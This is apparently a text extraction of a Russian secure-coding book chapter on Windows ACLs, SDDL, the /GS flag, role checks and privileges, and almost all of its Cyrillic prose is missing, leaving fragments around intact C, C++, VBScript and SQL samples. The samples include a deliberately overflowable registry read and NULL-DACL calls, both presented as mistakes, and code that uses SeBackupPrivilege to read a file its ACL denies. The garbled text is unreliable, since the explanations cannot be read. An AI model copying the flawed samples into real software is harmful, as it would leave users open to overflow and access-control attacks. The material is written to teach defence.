, 
. . 
szTmp,
. , 
.

/GS Visual C++ .NET


/GS Visual C++ .NET 

EBP, .
/GS .

144

II

/GS , StackGuard, 
(Grispin Cowan) http://
www.immunix.org. , 
gcc. /GS StackGuard
, .
. ,
Visual C++ .NET, /GS
? . ,
/GS, StackGuard . 

. ( ,
Microsoft Office.)
(stack smashing)
. 
/GS.
(pointer subterfuge)
. /GS 
, .
(register attack) ,
( EBP), . 
.
VTable (VTable hijacking)
, VTable . , /GS
. /GS 
, ,
, 
. , VTable 
.
(exception handler clobbe
ring) , 
. /GS ,
.
(index out of range) 
,
. /GS ,
.
(heap overflow)
. /GS .
/GS , ? 

, EIP EBP. 
, ,
, . ,
, /GS

5 1:

145

( ). 
,
.
, , 
. , 
.
. , , 
, (
http://immunix.org/stackguard.html), , 
.
(Greg Hoglund)
NTBUGTRAQ, , /GS. ,
, .
, 
, ,
.
, 
, , , , .
, ,
. . 
,
.
( ), .
,
?

. ,
.
:

grep strcpy *.c


, Perl, 
. ,
. , ,
.
, .

. ,
: , , , 
ABS.
. , 2000 .
, , .
/GS. , , 
. , /GS,
, .

146

II

/GS ( ) ,
. 

(
).
! /GS , .
, .


. , 
. , , 
, ,
.
, 
. :
,
Strsafe.h, . ,
, .
, ,
, , .

Microsoft Windows
. 
(Access Control List, ACL). 
ACL Windows NT/2000/XP Windows .NET Server
2003. 
, ACL
,
.
, .
, ,
, , ACL, 
, , ACL, 
(Discretionary Access Control List, DACL) 
(Access Control Entry, ACE)
.

ACL
,
ACL ,
. 
, .
! ACL
. .

148

II

, 
, ACL Full Control (
) Everyone (). ,
, , ,
, 
. , , 
ACL:

#define MAX_BUFF (64)


#define MY_VALUE "SomeData"
BYTE bBuff[MAX_BUFF];
ZeroMemory(bBuff, MAX_BUFF);
// .
HKEY hKey = NULL;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Northwindtraders",
0,
KEY_READ,
&hKey) == ERROR_SUCCESS) {
// , .
DWORD cbBuff = 0;
if (RegQueryValueEx(hKey,
MY_VALUE,
NULL,
NULL,
NULL,
&cbBuff) == ERROR_SUCCESS) {
// .
if (RegQueryValueEx(hKey,
MY_VALUE,
NULL,
NULL,
bBuff,
&cbBuff) == ERROR_SUCCESS) {
// ! .
}
}
}
if (hKey)
RegCloseKey(hKey);
, 
. ,
64 . RegQueryValueEx
, ,
. 64 ,
.

149

? (
). ACL .
Full Control Everyone, ,
, 
64 , . , 
Everyone Deny: Full Controll (:
), .
ACL Full Control Administrators Read
() Everyone, , 
( WRITE_DAC). 
. 
, ,
.
, !
, , ACL, 
? ! ,
3. , 
.

:
ACL,
, ,
, .
:

// , .
DWORD cbBuff = 0;
if (RegQueryValueEx(hKey,
MY_VALUE,
NULL,
NULL,
NULL,
&cbBuff) == ERROR_SUCCESS) {
BYTE *pbBuff = new BYTE[cbBuff];
// , cbBuff.
if (pbBuff && RegQueryValueEx(hKey,
MY_VALUE,
NULL,
NULL,
pbBuff,
&cbBuff) == ERROR_SUCCESS) {
// ! .
// .
}
}
delete [] pbBuff;

150

II

, . 
, , 
. , 
ACL 10 , 
10 ?
? , 
10 . 
, ,
.
:

BYTE bBuff[MAX_BUFF];
ZeroMemory(bBuff, MAX_BUFF);
HKEY hKey = NULL;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Northwindtraders",
0,
KEY_READ,
&hKey) == ERROR_SUCCESS) {
DWORD cbBuff = sizeof (bBuff);
// , , MAX_BUFF.
if (RegQueryValueEx(hKey,
MY_VALUE,
NULL,
NULL,
bBuff,
&cbBuff) == ERROR_SUCCESS) {
// ! .
}
}
if (hKey)
RegCloseKey(hKey);
,
, , , MAX_BUFF.
, RegQueryValueEx ERROR_MO
RE_DATA, , .
: , 
ACL.
ACL
 
. ACL.

ACL
ACL, , ,
. , , .. ACL
, ,

151

Windows NT/2000/XP. Windows 95/98/Me Windows CE ACL 


.
Windows NT ACL* : 
(Discretionary Access Control List, DACL) (System Access
Control List, SACL) .
, .
, DACL,
SACL:
;
( \\BlakesLaptop\BabyPictures);
;
;
;
(mutex);
(named pipes);
;
;
Active Directory.
DACL (Access
Control Entry, ACE), . DACL, NULL, ,
. 
DACL , , 
.
DACL .
ACE : ,
(security ID, SID)
. SID ,
.
ACE SID Everyone () Full Control ( 
). Everyone , World ( 
), S110. Full Control ,
. , Full Control ,
! , ACE ,
. , Everyone 
Full Control ,
! .
ACE,
(DS), .

. (ACL) Windows NT/2000/


XP (DACL) (SACL) 
. ,
. . .

152

II

, ACL
szVol, 
:

#include <stdio.h>
#include <windows.h>
void main() {
char *szVol = "c:\\";
DWORD dwFlags = 0;
if (GetVolumeInformation(szVol,
NULL,
0,
NULL,
NULL,
&dwFlags,
NULL,
0)) {
printf(" %s %s ACL.",
szVol,
(dwFlags & FS_PERSISTENT_ACLS) ? "" : "");
} else {
printf(" %d",GetLastError());
}
}
: , \\Blakes
Laptop\BabyPictures. GetVolumeInformation
Platform SDK MSDN.
VBScript (Microsoft Visual Basic
Scripting Edition) Microsoft JScript. VBScript
, NTFS,
ACL, FileSystemObject. 
, NTFS ,
ACL. , Windows 
ACL NTFS.

Dim fso, drv


Dim vol: vol = "c:\"
Set fso = CreateObject("Scripting.FileSystemObject")
Set drv = fso.GetDrive(vol)
Dim fsinfo: fsinfo = drv.FileSystem
Dim acls : acls = False
If StrComp(fsinfo, "NTFS", vbTextCompare) = 0 Then acls = True
WScript.Echo(" " & vol & " " & fsinfo)
Wscript.Echo(" ACL? " & acls)
FileSystemObject,
Windows Script Host.

153


, ACL. 
Windows . , , 
. 
, ;
Administrators ().

ACL
, 
, : ACE ACL,
. , , ACE 
ACL, .
.
ACL. 
ACL;
.
, ACL , :
1. , ;
2. , 
;
3. ;
4. 
.
, , , 
, , Web, . ., 
. , ACL
. ,
, , .
.
, Everyone:
Full Control . 
:
. 
: .
.
.
. , 
(use case) UML
(Unified Modeling Language), , ,
. 
, ,
.

154

II

UML 
(Martin Fowler) (Kendall Scott) UML Distilled: A
Brief Guide to the Standard Object Modeling Language ( UML:
)
(2nd Edition, AddisonWesley Publishing Co, 1999).
, ACL ACE, 
, : 
  
. ACE. 
, , 
ACE: Interactive: Read (: ). 
. 32
, ,
ACE.
Interactive , 
, 
( , 
). ,
SID , LogonUser
dwLogonType, LOGON32_LOGON_INTER
ACTIVE.
,
. , 
FTP HTTP
IIS 5.
(
, ), ACL.
ACL, . 61.

6-1. (ACL),
-

Accounting ()

Deny: Full Control (: )

Interactive

Read ()

Administrators ()

Full Control ( )

SYSTEM

Full Control ( )

! ACL ACE
. ACL,
Windows, ACE
. 
ACE , 
, .

155


Everyone: Full Control ACL 
.
, , , 
. 
, , 
ACL
!
ACL , 
(Terminal Server). 

, ,
ACL 
.

ACL
2001 . Microsoft
Weak Permissions on Winsock Mutex Can Allow Service
Failure ( Winsock
) (MS01003) (www.microsoft.com/technet/security).

ACE-
, 
. 
ACE.

. 

.

ACL
, ,
ACL , ,
. ACL Windows NT 4 Windows 2000,
Visual Studio .NET
ATL (Active Template Library).

ACL Windows NT 4
, ACL
C++,  . ,
ACL , 

. Windows NT 4

156

II

. ( Windows NT
malloc AddAce!) , ACL 
(security descriptor), .
: ACL,
. ACL
. , ACL, 
, ACL
.

/*
NT4ACL.cpp
*/
#include <windows.h>
#include <stdio.h>
#include <aclapi.h>
PSID pEveryoneSID = NULL, pAdminSID = NULL, pNetworkSID = NULL;
PACL pACL = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
// ACL ACE!:
// Network (Deny Access)
// Everyone (Read)
// Administrator (Full Control)
try {
const int NUM_ACES = 3;
EXPLICIT_ACCESS ea[NUM_ACES];
ZeroMemory(&ea, NUM_ACES * sizeof(EXPLICIT_ACCESS)) ;
// SID Network.
SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;
if (!AllocateAndInitializeSid(&SIDAuthNT, 1,
SECURITY_NETWORK_RID,
0, 0, 0, 0, 0, 0, 0,
&pNetworkSID) )
throw GetLastError();
ea[0].grfAccessPermissions = GENERIC_ALL;
ea[0].grfAccessMode = DENY_ACCESS;
ea[0].grfInheritance= NO_INHERITANCE;
ea[0].Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea[0].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
ea[0].Trustee.ptstrName = (LPTSTR) pNetworkSID;
// SID Everyone.
SID_IDENTIFIER_AUTHORITY SIDAuthWorld =
SECURITY_WORLD_SID_AUTHORITY;
if (!AllocateAndInitializeSid(&SIDAuthWorld, 1,
SECURITY_WORLD_RID,

0, 0, 0, 0, 0, 0, 0,
&pEveryoneSID) )
throw GetLastError();
ea[1].grfAccessPermissions = GENERIC_READ;
ea[1].grfAccessMode = SET_ACCESS;
ea[1].grfInheritance= NO_INHERITANCE;
ea[1].Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea[1].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
ea[1].Trustee.ptstrName = (LPTSTR) pEveryoneSID;
// SID
// BUILTIN\Administrators.
if (!AllocateAndInitializeSid(&SIDAuthNT, 2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&pAdminSID) )
throw GetLastError();
ea[2].grfAccessPermissions = GENERIC_ALL;
ea[2].grfAccessMode = SET_ACCESS;
ea[2].grfInheritance= NO_INHERITANCE;
ea[2].Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea[2].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
ea[2].Trustee.ptstrName = (LPTSTR) pAdminSID;
// ACL ACE!.
if (ERROR_SUCCESS != SetEntriesInAcl(NUM_ACES,
ea,
NULL,
&pACL))
throw GetLastError();
// .
pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR,
SECURITY_DESCRIPTOR_MIN_LENGTH);
if (pSD == NULL)
throw GetLastError();
if (!InitializeSecurityDescriptor(pSD,
SECURITY_DESCRIPTOR_REVISION))
throw GetLastError();
// ACL .
if (!SetSecurityDescriptorDacl(pSD,
TRUE, // fDaclPresent flag
pACL,
FALSE)) {
throw GetLastError();

157

158

II

} else {
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = FALSE;
sa.lpSecurityDescriptor = pSD;
if (!CreateDirectory("C:\\Program Files\\MyStuff", &sa))
throw GetLastError();
} // try.
} catch(...) {
// .
}
if (pSD)
LocalFree(pSD);
if (pACL)
LocalFree(pACL);
// FreeSID SID, AllocateAndInitializeSID.
if (pEveryoneSID)
FreeSid(pEveryoneSID);
if (pNetworkSID)
FreeSid(pNetworkSID);
if (pAdminSID)
FreeSid(pAdminSID);
Secureco2\Chapter06. ,
, . ,
ACL 
(security descriptor). 
SECURITY_ATTRIBUTES, , , 
. :
( SID), SetSecurity
DescriptorOwner;
( SID), SetSecurityDescriptor
Group;
DACL, SetSecurityDescriptorDacl;
SACL, SetSecurityDescriptorSacl.

. , , 
, ,
Administrators (), 
. DACL, 
EXPLICIT_ACCESS. EXPLICIT_ACCESS
ACE (SID) 
, . EXPLICIT_ACCESS 

159

, , ACE .
ACL . 61.
API, ACL:
SetFileSecurity SetNamedSecurityInfo. Windows NT,
Windows NT 4 .
Windows 2000 , 

(Security Descriptor Definition Language), .

SECURITY_ATTRIBUTES

SECURITY_DESCRIPTOR

ACL

EXPLICIT_ACCESS

SID

. 61.

EXPLICIT_ACCESS

SID

ACL

ACL Windows 2000


, , 
ACL Windows NT 4, Win
dows 2000 ACL 
, Security Descriptor Definition Language (SDDL
). SDDL
(SID) (ACE)
.
SDDL Sddl.h 
Microsoft Platform SDK.
C:\MyDir 
ACE:
Guests (Deny: Full Control) [ (: )];
SYSTEM (Full Control);
Administrators (Full Control);
Interactive (Read, Write, Execute) [ (, , )].

160

II

/*
SDDLACL.cpp
*/
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <sddl.h>
void main() {
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = FALSE;
char *szSD = "D:P"
// DACL
"(D;OICI;GA;;;BG)"
// Guests
"(A;OICI;GA;;;SY)"
// SYSTEM
"(A;OICI;GA;;;BA)"
// Admins
"(A;OICI;GRGWGX;;;IU)";// ,
// Interactive
if (ConvertStringSecurityDescriptorToSecurityDescriptor(
szSD,
SDDL_REVISION_1,
&(sa.lpSecurityDescriptor),
NULL)) {
if (!CreateDirectory("C:\\MyDir", &sa )) {
DWORD err = GetLastError();
}
LocalFree(sa.lpSecurityDescriptor);
}
}
( Secureco2\Chapter06.)
, Windows NT 4. SDDL
szSD .
SDDL ACL (. 62).

6-2.

SDDL-

SDDL-

D:P

D , DACL. S:
ACE ( SACL). ACE
. P SE_DACL_PROTECTED,
ACE 
. 
,

(D;OICI;GA;;;BG)

ACE. ACE 
.
D ACE.

161

()

6-2.
SDDL-

OICI . , ACE
(
) ( ),
.
GA Generic All Access, .
BG Guests (Builtin Guests).
ACE 
.

ObjectTypeGuid InheritedObjectTypeGuid.
, ACE (
). ACE

A ACE.

(A;OICI;GA;;;SY)

SY SYSTEM ( )
(A;OICI;GA;;;BA)

BA Administrators (Builtin Administrators)

(A;OICI;GRGWGX;;;IU)

GR , GW , GX .
IU Interactive (, 
)

. 62 SDDL.
DACL

D:(D;OICI;GA;;;BG)(A;OICI;GA;;;SY) (A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)
ACE

. 62.

ACE

SDDL

,
. 63 SID Windows 2000
.

6-3. SID SDDL


SDDL-
AO

Account Operators ( )

AU

Authenticated Users ( )

BA

Builtin Administrators Administrators (


)

BG

Builtin Guests Guests ()

BO

Backup Operators ( )

BU

Builtin Users Users ()

CA

Certificate Server Administrators Administrators 

CO

Creator Owner ()

DA

Domain Administrators ( )

. . .

162

II

6-3.

()

SDDL-

DG

Domain Guests ( )

DU

Domain Users ( )

IU

Interactive ()

LA

Local Administrator ( )

LG

Local Guest ( )

NU

Network ()

PO

Print Operators ( )

PU

Power Users ( )

RC

Restricted Code ,
CreateRestrictedToken Windows 2000

SO

Server Operators ( )

SU

Service Logon User , 


SY

Local System ( )

WD

World ( , Everyone)

NS

Network Service ( Windows XP )

LS

Local Service ( Windows XP )

AN

Anonymous Logon ( ) ( Windows XP


)

RD

Remote Desktop Users ( )


Terminal Server Users ( )
(Windows XP )

NO

Network Configuration Operators ( )


( Windows XP )

LU

Logging Users ( Windows .NET Server )

MU

Monitoring Users ( Windows .NET Server )

SDDL , SDDL 
XML. , SDDL INF 
(Security Configuration Editor) 
ACL NTFS.
Windows (Windows Security
Push) 
, Windows XP Logging Users Monitoring Users.

ACL Active Template Library


ATL (Active Template Library) C++,
Visual Studio 6 Visual Studio .NET. 
ATL, 
Windows, ACL 
. ( Visual Studio
.NET) ACL :

163

Blake (Read);
Administrators (Full Control);
Guests (Deny: Access).

/*
ATLACL.cpp
*/
#include <atlsecurity.h>
#include <iostream>
using namespace std;
void main(){
try {
// .
CSid sidBlake("Northwindtraders\\blake");
CSid sidAdmin = Sids::Admins();
CSid sidGuests = Sids::Guests();
// ACL ACE!.
// : ACE .
CDacl dacl;
dacl.AddDeniedAce(sidGuests, GENERIC_ALL);
dacl.AddAllowedAce(sidBlake, GENERIC_READ);
dacl.AddAllowedAce(sidAdmin, GENERIC_ALL);
// .
CSecurityDesc sd;
sd.SetDacl(dacl);
CSecurityAttributes sa(sd);
// .
if (CreateDirectory("c:\\MyTestDir", &sa))
cout << " !" << endl;
} catch(CAtlException e) {
cerr << ", ".
<< hex << (HRESULT)e << endl;
}
}
Sids::Admins() Sids::Guests().
SID ,
Administrators Guests, ,
Windows (, , ) 
. SID
C++, atlsecurity.h.

164

II

, ,
Windows NT 4 Windows 2000. , Windows NT 4,
, , Windows 2000, SDDL
. Secureco2\Chapter06.
, ACL ,
ACL.

ACE-
ACE ACL. 
Windows ACE.
, 
. ,
ACL , , ACE,
. ACE
ACL:
, (Explicit Deny);
, (Explicit Allow);
, ;
, ;
, ;
, ;
, ;
, . .
ACL ACE, 
.
1. GetSecurityInfo GetNamedSecurityInfo,
ACL .
2. ACE EXPLICIT_ACCESS.
3. SetEntriesInAcl, ACL EXPLI
CIT_ACCESS, ACE.
4. SetSecurityInfo SetNamedSecurityInfo,
ACL .
C++, . 
, , CreateWellKnownSid (
Windows 2000 SP3, Windows XP Windows .NET Server),
, ATL CSid.

/*
SetUpdatedACL.cpp
*/
#define _WIN32_WINNT 0x0501
#include "windows.h"
#include "aclapi.h"
#include <sddl.h>

int main(int argc, char* argv[]) {


char *szName = "c:\\junk\\data.txt";
PACL pDacl = NULL;
PACL pNewDacl = NULL;
PSECURITY_DESCRIPTOR sd = NULL;
PSID sidAuthUsers = NULL;
DWORD dwErr = 0;
try {
dwErr =
GetNamedSecurityInfo(szName,
SE_FILE_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
&pDacl,
NULL,
&sd);
if (dwErr != ERROR_SUCCESS)
throw dwErr;
EXPLICIT_ACCESS ea;
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
DWORD cbSid = SECURITY_MAX_SID_SIZE;
sidAuthUsers = LocalAlloc(LMEM_FIXED,cbSid);
if (sidAuthUsers == NULL)
throw ERROR_NOT_ENOUGH_MEMORY;
if (!CreateWellKnownSid(WinAuthenticatedUserSid,
NULL,
sidAuthUsers,
&cbSid))
throw GetLastError();
BuildTrusteeWithSid(&ea.Trustee, sidAuthUsers);
ea.grfAccessPermissions = GENERIC_READ;
ea.grfAccessMode
= SET_ACCESS;
ea.grfInheritance
= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea.Trustee.TrusteeType = TRUSTEE_IS_GROUP;
dwErr = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
if (dwErr != ERROR_SUCCESS)
throw dwErr;
dwErr =
SetNamedSecurityInfo(szName,
SE_FILE_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,

165

166

II

NULL,
pNewDacl,
NULL);
} catch(DWORD e) {
//
}
if (sidAuthUsers)
LocalFree(sidAuthUsers);
if (sd)
LocalFree(sd);
if (pNewDacl)
LocalFree(pNewDacl);
return dwErr;
}
AddAccessAllowedAceEx AddAccessAllowedObjectAce ACE
ACL. ACL 
.
, AddAccessAllowedACE, 
ACL.
AddAccessAllowedACEEx.

SID

Windows SID (Terminal
Server) (Remote Desktop),
, (Win
dows 2000 Server) (Windows XP 
). SID , 
, ACL, :
Administrators (Full Control);
Remote Desktop Users (Read) [ (
)];
Interactive Users (Read, Write).
: SID Remote Desktop Users,
.
:
, Madison
. Madison SID
Interactive, ;
Madison ;

167


Windows XP VPN;
Madison
SID Remote Desktop Users. 
, , 
, ,

.
, , Madison ,
, . 
: 
. , Madison
.
, , Madison
, SID
!
, ? 
, ACL.

DACL ACE
DACL (NULL DACL)
, . 
, NULL DACL = . .
,
, , , , 
, DACL, .
, 
, , DACL !
, , 
. .

if (SetSecurityDescriptorDacl(&sd,
TRUE, // DACL...
NULL, // ... !
FALSE)) {
// DACL.
}

SECURITY_DESCRIPTOR. DACL:

SECURITY_DESCRIPTOR sd = {
SECURITY_DESCRIPTOR_REVISION,
0x0,
SE_DACL_PRESENT,
0x0,
0x0,
0x0,
0x0};
// DACL , .. .

168

II


DACL, ATL
Visual Studio .NET.
Windows XP, Secure Windows Initiative Team
Windows Security Penetration Team
DACL, .
,
DACL, :
,
ACL. , 
ACL;
DACL ,
DACL . 
,
, ,
!
, 
. , ACL ,
. 
ACL, .
.
DACL
.
NULL, DACL
, DACL, .
 Perl DACL
C++ C , 
Microsoft. DACL, 
, 
DACL . , 
, 
, DACL. :

SetSecurityDescriptorDacl(&sd,
TRUE,
NULL, // DACL
FALSE);
( ) :

SetSecurityDescriptorDacl(&sd,
TRUE,
::malloc(0xFFFFFFFF), // DACL
FALSE);

169

, . malloc 
, NULL.
0xFFFFFFFF, 4 294 967 295 , , 
, DACL NULL!
, , , ,
. ,
.

DACL
DACL : (
) Everyone (Deny: Access),
, Windows 
. ,
DACL SACL !
! DACL . , 
, .

ACE
ACE : Everyone (WRITE_DAC), Everyone (WRI
TE_OWNER) ACL, .

Everyone (WRITE_DAC)
WRITE_DAC DACL . 
ACL,
.

Everyone (WRITE_OWNER)
WRITE_OWNER 
. , , . 
, , 
.

Everyone (FILE_ADD_FILE)
ACE Everyone (FILE_ADD_FILE) , 

. ,
, .
, , 
, .

Everyone (DELETE)
ACE ,
, , 
.

170

II

Everyone (FILE_DELETE_CHILD)
Windows Delete
subfolders and files ( ) 
, , . 
FILE_DELETE_CHILD , 
.

Everyone (GENERIC_ALL)
GENERIC_ALL, Full Control ( ), ,
NULL DACL. .

, DACL
,
DACL, , , .
: 
.
DACL,
.
ACE, 
, !
ACL,
:
DACL [Everyone (WRITE_DAC)];
[Everyone (WRITE_OWNER)];
[Everyone (DELETE)].
, ,
:

DWORD dwFlags = KEY_ALL_ACCESS


& ~WRITE_DAC
& ~WRITE_OWNER
& ~DELETE;
:

DWORD dwFlags = FILE_ALL_ACCESS


& ~WRITE_DAC
& ~WRITE_OWNER
& ~DELETE
& ~FILE_DELETE_CHILD


ACL , .
.NET Framework COM+, IP,
SQL Server. , 
, ACL .

171

 
, 
, .
, 
, ( ) . 
, , 
. 
:
, 
, .
, , ,
.
Windows : .NET
Framework COM+. .

.NET Framework
.NET Framework
, 
(principal). ( 
) Windows .
.NET Framework
/ .
, 
(
).
. , 
.
.NET Framework 
.
(. ): Lippert LaMac
chia, Lange .

.NET Framework Prin
cipalPermission, CLR (Common Language Runtime) 
, .
PrincipalPermission , 
, 
.
, , .
, .NET Framework
Web Web:

WindowsPrincipal wp = (HttpContext.Current.User as WindowsPrincipal);


if ( wp.IsInRole("Managers")) {

172

II

// .
}
:

WindowsPrincipal principal =
(Thread.CurrentPrincipal as WindowsPrincipal);
if (principal.IsInRole("Administrator")) {
// .
}
: WindowsPrincipal. IsInRole , 
Windows, GenericPrincipal. IsInRole ,
,
.
GenericPrincipal , 
. C#, :

GenericIdentity id = new GenericIdentity("Blake");


// XML!
String[] roles = {"Manager", "Teller"};
GenericPrincipal principal = new GenericPrincipal(id, roles);

COM+
COM+ Windows,
.
, 
. , , 
, , , 
, .
COM+ Component
Services ( ) IsCallerInRole.
, Visual Basic:

.
Dim fAllowed As Boolean
Dim objCallCtx As SecurityCallContext
Set objCallCtx = GetSecurityCallContext()
' .
fAllowed = objCallCtx.IsCallerInRole("Doctor")
If (fAllowed) Then
.
End If
ACL, , ,
,
. , 
.

173

fIsDoctor = objCallCtx.IsCallerInRole("Doctor")
fIsOnDuty = IsCurrentlyOnDuty(szPersonID)
If (fIsDoctor And fIsOnDuty) Then
, ,
.
End If
 
.

IP-
Web, IIS. 

Web, IP (, 192.168.19.23),
(192.168.19.0/24), DNS (www.microsoft.com) (.micro
soft.com). Web 
IP, 
IP ,
.


accounting.northwindtraders.com,
: IP.
IP ,
 
. : IP
,
(127.0.0.1).
! Web, 
IP, IP
127.0.0.1.
VBScript , IP
Samples Web , 
localhost ( 127.0.0.1).

IP.
Dim oVDir
Dim oIP
Set oVDir = GetObject("IIS://localhost/W3SVC/1/Samples")
Set oIP = oVDir.IPSecurity
' IP! ! 127.0.0.1.
Dim IPList(1)
IPList(1) = "127.0.0.1"
oIP.IPGrant = IPList
' .
oIP.GrantByDefault = False

174

II

' IIS
' .
oVDir.IPSecurity = oIP
oVDir.SetInfo
Set oIP = Nothing
Set oVDir = Nothing

SQL Server
SQL Server
.
, .
: . ,

,  . ,
.
SQL Server ACL Windows,
: ( 
) . : 
Blake Accounts (), 
, AuditLog (
). SQL Server .


, ACL 
. . 
,
.

, , 
; 
. ,

,
. 
. 
, 
,
.
, .
, 
:
: .

:

175

: ;
: ;
: .
:
: ;
: ;
: .
, 
Windows SQL Server,
COM+. (:
.) :
ACL. , SQL Server;
, .

. ,
SQL Server.
,
. ,
.

create trigger checkaudit on tblAuditLog


for update, delete
as
begin
if not is_member(Northwindtraders\Auditors')
rollback tran
end
, 
,  .
:
, . 
, : (public) 
. ,
Everyone Windows. , 
. : ! 
, 
(
) .




, . 
. . 63 IP
Web.

176

II

IP-
Web-

. 63.

IP

, .
, IP,
.
! , , 
, .
. IIS,
( !) Web ( 
) : I .

! , Web, ,
Web
. , Web
SMB. 
, ACL Web 
? 
!
! :
ACL, SQL Server, IP . 
,
, ,
ACL IP, 
.


ACL , 
. ACL 
.
, 3, ACL 
.

:
. 
,
.  , 
, . 

, .

, 
. Windows 
,
. 
. ,
!
( 
), ,
, . 
, 
( 
, , ),
. , 
, , , 
. , 
Administrators (), 

178

II

.
.
, ,
, ,
. ,
. 
, ,
, ,
.
! 
,
.

,
, , 
, .
, 
. 
( , ), 
. 
(malware).

, , , 
, , 
.


, , 
, ,
. ,
.

(defacement) Web. 
,
, .


, , 
. 
, , , 
.

179

Back Orifice
, 
: , , 
.
Back Orifice Windows
, HKEY_LOCAL_MACHINE\SOFTWARE\Mic
rosoft\Windows\CurrentVersion\Run. 
. ,
Back Orifice .

SubSeven
Back Orifice, SubSeven 
. SubSeven
Windows, Win.ini System.ini, 
HKEY_LOCAL_MACHINE HKEY_CLASSES_ROOT.
. ,
, SubSeven .

FunLove
FunLove, Symantec W32.Funlove.4099, 
, W32.Bolzano.
, , , 
. FunLove 
Windows NT Ntoskrnl.exe. 
FunLove ,
.

ILoveYou
, , , VBS.Lo
veletter The Love Bug. ILoveYou Microsoft
Outlook. : , 
HKEY_LOCAL_MACHINE .
, .

Web-
Web, , 
 (script kiddies). Web Internet
Information Services (IIS), 
(Internet Printing Protocol, IPP) Microsoft Windows 2000.
, IPP ISAPI
(Internet Server Application Programming Interface),
(SYSTEM).
Microsoft (http://www.micro
soft.com/technet/security/bulletin/MS01023.asp):

180

II

 , ISAPI 

. ,
, 
, 
. ,
.
IPP Windows 2000 SYSTEM,
Web . 
,
Web.
! ,
, 
, 
. 
, .
! , 
, ,
Windows.


Microsoft Windows NT/2000/
XP Windows .NET Server 2003 :
(Discre
tionary Access Control List, DACL). DACL (
ACL* ) (Access Control Entry, ACE).
ACE (Security ID, SID) 
(principal), , ,
, . 
, ,
, ACL.
ACL 6.


Windows , 
, (
) , , 
, , 

. (ACL) Windows NT/2000/


XP (DACL) (SACL) 
. ,
. . .

181

. . , 
(, ) 
. 71.

7-1.

Windows

( )


#define (Winnt.h)

Backup Files And Directories


(
)

SeBackupPrivilege (16)

SE_BACKUP_NAME

Restore Files And Directories


(
)

SeRestorePrivilege (17)

SE_RESTORE_NAME

Act As Part Of The Operating SeTcbPrivilege (6)


System (
)

SE_TCB_NAME

Debug Programs
( )

SeDebugPrivilege (19)

SE_DEBUG_NAME

Replace A Process Level


Token (
)

SeAssignPrimaryToken
Privilege (2)

SE_ASSIGNPRIMARYTOKEN_
NAME

Load And Unload Device


SeLoadDriverPrivilege (9)
Drivers (
)

SE_LOAD_DRIVER_NAME

Take Ownership Of Files Or


Other Objects (

)

SE_TAKE_OWNERSHIP_NAME

SeTakeOwnershipPrivilege (8)

,
, , 
.
. 
, 
.
.

SeBackupPrivilege
Backup files and directories 
, . , Blake
, , , ACL
.
, CreateFile FILE_FLAG_
BACKUP_SEMANTICS. , .
1. , 
,
.
2. Test.txt .

182

II

3. ACL ACE, 
. , Blake, ACE:
Blake (Deny All).
4. .
, , MSDN (http://
msdn.microsoft.com) Platform SDK

/*
WOWAccess.cpp
*/
#include <stdio.h>
#include <windows.h>
int EnablePriv (char *szPriv) {
HANDLE hToken = 0;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES,
&hToken)) {
printf("OpenProcessToken() !> %d", GetLastError());
return !1;
}
TOKEN_PRIVILEGES newPrivs;
if (!LookupPrivilegeValue (NULL, szPriv,
&newPrivs.Privileges[0].Luid)) {
printf("LookupPrivilegeValue() !>%d",
GetLastError());
CloseHandle (hToken);
return !1;
}
newPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
newPrivs.PrivilegeCount = 1;
if (!AdjustTokenPrivileges(hToken, FALSE, &newPrivs , 0,
NULL, NULL)) {
printf("AdjustTokenPrivileges() !>%d",
GetLastError());
CloseHandle (hToken);
return !1;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
printf("AdjustTokenPrivileges() ,
\n");
CloseHandle (hToken);
return 0;
}

183

void DoIt(char *szFileName, DWORD dwFlags) {


printf("\n\n %s 0x%x \ n",
szFileName, dwFlags);
HANDLE hFile = CreateFile(szFileName,
GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING,
dwFlags,
NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf(" CreateFile() !> %d",
GetLastError());
return;
}
char buff[128];
DWORD cbRead=0, cbBuff = sizeof buff;
ZeroMemory(buff, sizeof buff);
if (ReadFile(hFile, buff, cbBuff, &cbRead, NULL)) {
printf(", %d \n\n: %s",
cbRead, buff);
} else {
printf("ReadFile() ! > %d", GetLastError());
}
CloseHandle(hFile);
}
void main(int argc, char* argv[]) {
if (argc < 2) {
printf(": %s <filename>", argv[0]);
return;
}
// .
If (EnablePriv(SE_BACKUP_NAME) == !1)
return;
// .
DoIt(argv[1], FILE_ATTRIBUTE_NORMAL);
// !
DoIt(argv[1], FILE_ATTRIBUTE_NORMAL |
FILE_FLAG_BACKUP_SEMANTICS);
}
Secureco2\Chap
ter07. :

184

II

Test.txt 0x80.
CreateFile() !> 5
Test.txt 0x2000080 flags
, 15 .
: Hello, Blake!
, CreateFile
( 5), , , 
